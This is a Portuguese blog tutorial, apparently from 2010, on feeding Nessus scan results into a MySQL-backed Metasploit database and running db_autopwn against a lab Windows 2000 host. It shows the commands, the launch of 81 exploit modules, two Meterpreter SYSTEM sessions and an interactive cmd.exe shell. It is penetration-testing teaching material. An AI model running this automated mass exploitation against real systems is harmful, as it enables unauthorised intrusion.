Usando o Nessus plugin com o MySQL e o db_autopwn no Metasploit

No post anterior apresentei como a integração entre o Nessus e o MSF pode tornar nossa vida bastante interessante.

Agora irei rebuscar os testes usando o MySQL para manter os alvos e suas vulnerabilidades em uma base de dados, explorando-as de forma automatizada com o db_autopwn.

O ambiente dos testes continuará o mesmo:

Host Debian com o Nessus, Metasploit e o MySQL
Host Windows 2000

Pré-requisito para os testes:

Possuir os seguintes itens instalados:

* libdbd-mysql-ruby1.8
* Módulo activerecord ( gem install activerecord )

Preparando o ambiente

Inicei o driver para MySQL no MSF

msf> db_driver mysql

Conectei o banco e criei uma base de dados chamada msf

msf> db_connect msf:******@localhost/msf

Importei o report do Nessus para o banco

msf> nessus_report_get af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0

Listando as portas apartir da base de dados msf


msf> db_services

Services
========

created_at info name port proto state updated_at Host Workspace
———- —- —- —- —– —– ———- —- ———
Fri Oct 01 12:06:03 UTC 2010 ftp 21 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 epmap 135 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
ri Oct 01 12:06:03 UTC 2010 135 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 netbios-ns 137 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 smb 139 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 cifs 445 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 dce-rpc 1025 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 dce-rpc 1028 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 www 5800 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 www 5801 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 vnc 5900 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 vnc 5901 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default

Listando as vulnerabilidades apartir da base de dados msf


msf > db_vulns

[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5901 proto=tcp name=NSS-19288 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5901 proto=tcp name=NSS-10342 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=21 proto=tcp name=NSS-22964 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5900 proto=tcp name=NSS-19288 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5900 proto=tcp name=NSS-10342 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5801 proto=tcp name=NSS-24260 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-10758 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-10107 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-43111 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=1028 proto=udp name=NSS-10736 refs=
….


O db-autopwn

O db_autopwn escaneará a base de dados e criará uma lista de módulos específicos para cada vulnerabilidade existente no alvo. A criação destes módulos ocorrerá de 2 formas:

1 – Os exploits serão carregados através da análise da lista de vulnerabilidades. Este tipo de cross-referência depende de alguns padrões como OSVDB, Bugtraq, e CVE para vincular o exploit ao alvo.

2 – Usa portas padrões associadas a cada exploit para localizar os alvos que estão rodando o mesmo serviço.


msf > db_autopwn

[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds


Hora da ação 😛


msf > db_autopwn -p -t -e

[*] Analysis completed in 7 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] 192.168.0.6:5800 exploit/windows/vnc/winvnc_http_get (port match)
[*] 192.168.0.6:445 exploit/windows/smb/ms06_066_nwapi (port match)
[*] 192.168.0.6:21 exploit/windows/ftp/filecopa_list_overflow (port match)
[*] 192.168.0.6:21 exploit/windows/ftp/servu_mdtm (port match)
[*] 192.168.0.6:21 exploit/windows/ftp/easyfilesharing_pass (port match)
[*] 192.168.0.6:445 exploit/windows/smb/netidentity_xtierrpcpipe (port match)
[*] 192.168.0.6:445 exploit/windows/brightstor/ca_arcserve_342 (port match)
[*] 192.168.0.6:445 exploit/linux/samba/trans2open (port match)
….

================================================================================
[*] (1/81 [0 sessions]): Launching exploit/windows/vnc/winvnc_http_get against 192.168.0.6:5800…
[*] (2/81 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.0.6:445…
[*] (3/81 [0 sessions]): Launching exploit/windows/ftp/filecopa_list_overflow against 192.168.0.6:21…
[*] (4/81 [0 sessions]): Launching exploit/windows/ftp/servu_mdtm against 192.168.0.6:21…
[*] (5/81 [0 sessions]): Launching exploit/windows/ftp/easyfilesharing_pass against 192.168.0.6:21…
[*] (6/81 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.0.6:445…
[*] (7/81 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.0.6:445…
[*] (8/81 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.0.6:445…
[*] (9/81 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.0.6:139…
….

[*] (81/81 [0 sessions]): Waiting on 35 launched modules to finish execution…
[*] Meterpreter session 1 opened (192.168.0.3:46168 -> 192.168.0.6:15979) at Fri Oct 01 10:37:39 -0300 2010
[*] Meterpreter session 2 opened (192.168.0.3:43223 -> 192.168.0.6:24353) at Fri Oct 01 10:37:40 -0300 2010
[*] (81/81 [2 sessions]): Waiting on 22 launched modules to finish execution…
[*] (81/81 [2 sessions]): Waiting on 12 launched modules to finish execution…
[*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution…
[*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution…
[*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution…
….

[*] The autopwn command has completed with 2 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================

Active sessions
===============

Id Type Information Connection Via
— —- ———– ———- —

1 meterpreter x86/win32 NT AUTHORITYSYSTEM @ W2KVITIMA 192.168.0.3:46168 -> 192.168.0.6:15979 exploit/windows/dcerpc/ms03_026_dcom
2 meterpreter x86/win32 NT AUTHORITYSYSTEM @ W2KVITIMA 192.168.0.3:43223 -> 192.168.0.6:24353 exploit/windows/dcerpc/ms03_026_dcom

[*] ================================================================================

Iniciando a sessão


msf > sessions -i 1

[*] Starting interaction with 1…


meterpreter > execute -i -H -f cmd.exe

Process 736 created.
Channel 1 created.

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:WINNTsystem32>


Observações importantes:


0 – Isso não é magia é tecnologia

1 – Estes testes são de caráter totalmente experimental;

2 – O uso destas ferramentas e ações requerem alguns conhecimentos prévios como:

* Entender sistemas operacionais;
* Entender profundamente o protocolo TCP/IP;
* Entender o funcionamento dos exploits, payloads, shellcodes e etc;
* Entender a dinâmica das causas e os impactos das vulnerabilidades;
* Usar estes conhecimentos de forma ética;

Author: alexos

Comments

Comments are closed.